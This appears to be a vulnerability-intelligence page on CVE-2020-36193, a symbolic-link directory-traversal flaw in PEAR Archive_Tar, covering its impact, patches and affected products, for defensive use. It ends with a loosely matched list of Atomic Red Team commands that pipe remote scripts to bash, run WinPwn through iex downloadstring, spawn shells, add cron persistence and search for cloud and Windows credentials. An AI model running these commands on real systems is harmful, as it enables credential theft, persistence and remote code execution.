CVE-2020-36193
Overview
This vulnerability is a directory traversal flaw caused by insufficient validation of symbolic links within the Tar.php component of the Archive_Tar library up to version 1.4.11. The root cause lies in the inadequate checks performed when handling write operations, allowing traversal outside intended directories. The affected component is the file archiving and extraction functionality that processes symbolic links improperly, enabling unauthorized filesystem write access.
Vulnerability Description
Tar.php in Archive_Tar through 1.4.11 allows write operations with Directory Traversal due to inadequate checking of symbolic links, a related issue to CVE-2020-28948.
Impact
An unauthenticated attacker can leverage this flaw by supplying a malicious archive to write files outside the designated extraction directory, potentially overwriting critical system or application files. This can lead to unauthorized modification of files, enabling code injection or persistence mechanisms. The attack requires the ability to have the vulnerable Archive_Tar component process attacker-controlled archives, which may occur in automated import or unpacking workflows. The real-world consequence includes unauthorized file manipulation and potential system compromise in environments relying on the vulnerable library for archive handling.
Solution
Users should upgrade Archive_Tar to a version later than 1.4.11 where this issue is resolved, as documented in the Gentoo GLSA-202101-23 and Debian DSA-4894 advisories. Fedora users should apply updates corresponding to Fedora versions 32 through 35 as announced in Fedora package-announce mailing lists. Detailed patching instructions and version-specific fixes are available in these vendor advisories and the referenced Debian and Gentoo security pages. Applying these updates will correct symbolic link validation during archive extraction.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability associated with the Archive_Tar component in PHP versions up to 1.4.11 arises from inadequate validation of symbolic links during file write operations. This oversight allows for directory traversal attacks, where an attacker can manipulate the file paths to write files outside of the intended directory structure. Specifically, by exploiting this flaw, an attacker could craft a malicious tar archive containing symbolic links that point to sensitive directories or files on the server. When processed by the affected component, these links could lead to unauthorized file creation or modification, potentially compromising the integrity and confidentiality of the system.
Attack vectors leveraging this vulnerability are varied and can be executed with relative ease. An attacker could upload a specially crafted tar file to a web application that utilizes the Archive_Tar library for file extraction. Once the file is processed, the attacker could gain access to restricted areas of the file system, allowing them to overwrite critical configuration files or inject malicious scripts. This exploitation could be performed remotely, making it particularly dangerous for web applications that handle user-uploaded content without stringent validation measures. Additionally, the vulnerability's presence in widely used platforms such as Drupal and various Linux distributions increases the likelihood of successful exploitation.
The real-world impact of this vulnerability can be significant, especially for organizations that rely on the affected products for their web applications. Successful exploitation could lead to data breaches, loss of sensitive information, or even complete system compromise. The business risks associated with such incidents include reputational damage, legal liabilities, and financial losses stemming from remediation efforts and potential regulatory fines. Furthermore, the ease of exploitation means that even organizations with moderate security postures could find themselves at risk, emphasizing the need for vigilant security practices.
To detect and mitigate the risks associated with this vulnerability, organizations should implement several strategies. Regularly updating software components to their latest versions is crucial, as many vulnerabilities are addressed in newer releases. Additionally, employing web application firewalls (WAFs) can help filter out malicious requests that attempt to exploit this flaw. Implementing strict input validation and sanitization measures for user-uploaded files is also essential in preventing the upload of malicious tar archives. Furthermore, conducting regular security audits and penetration testing can help identify and remediate potential vulnerabilities before they can be exploited by attackers.
In conclusion, the vulnerability present in the Archive_Tar component poses a significant threat to systems that utilize it, particularly in web applications. The potential for directory traversal attacks highlights the importance of robust security practices, including timely updates, input validation, and proactive security measures. By understanding the nature of this vulnerability and implementing effective detection and mitigation strategies, organizations can better protect themselves against the risks associated with exploitation.
CSURFACE threat intelligence has identified a new detection of activity exploiting the CVE-2020-36193 vulnerability in the PEAR Archive_Tar component, marking a clear shift from prior periods of inactivity. This emergence is accompanied by a sharp escalation in telemetry signals, indicating that threat actors may be actively probing or attempting to leverage this directory traversal flaw. Although the EPSS score shows a slight decline, the vulnerability remains in the upper percentile for exploit likelihood, underscoring its continued relevance. The absence of new exploit details suggests that while exploitation attempts are increasing, publicly documented proof-of-concept or weaponized exploits have yet to materialize. For defenders, this development signals an elevated risk environment where opportunistic attackers could capitalize on insufficiently patched systems. Consequently, the threat level should be considered heightened due to the combination of renewed adversary interest and the vulnerability’s inherent severity.
Affected Products (11)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Php | Archive Tar | All |
cpe:2.3:a:php:archive_tar:*:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 32 |
cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 33 |
cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 34 |
cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 35 |
cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 9.0 |
cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 10.0 |
cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*
|
|
|
Drupal | Drupal | All |
cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*
|
|
|
Drupal | Drupal | All |
cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*
|
|
|
Drupal | Drupal | All |
cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*
|
|
|
Drupal | Drupal | All |
cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.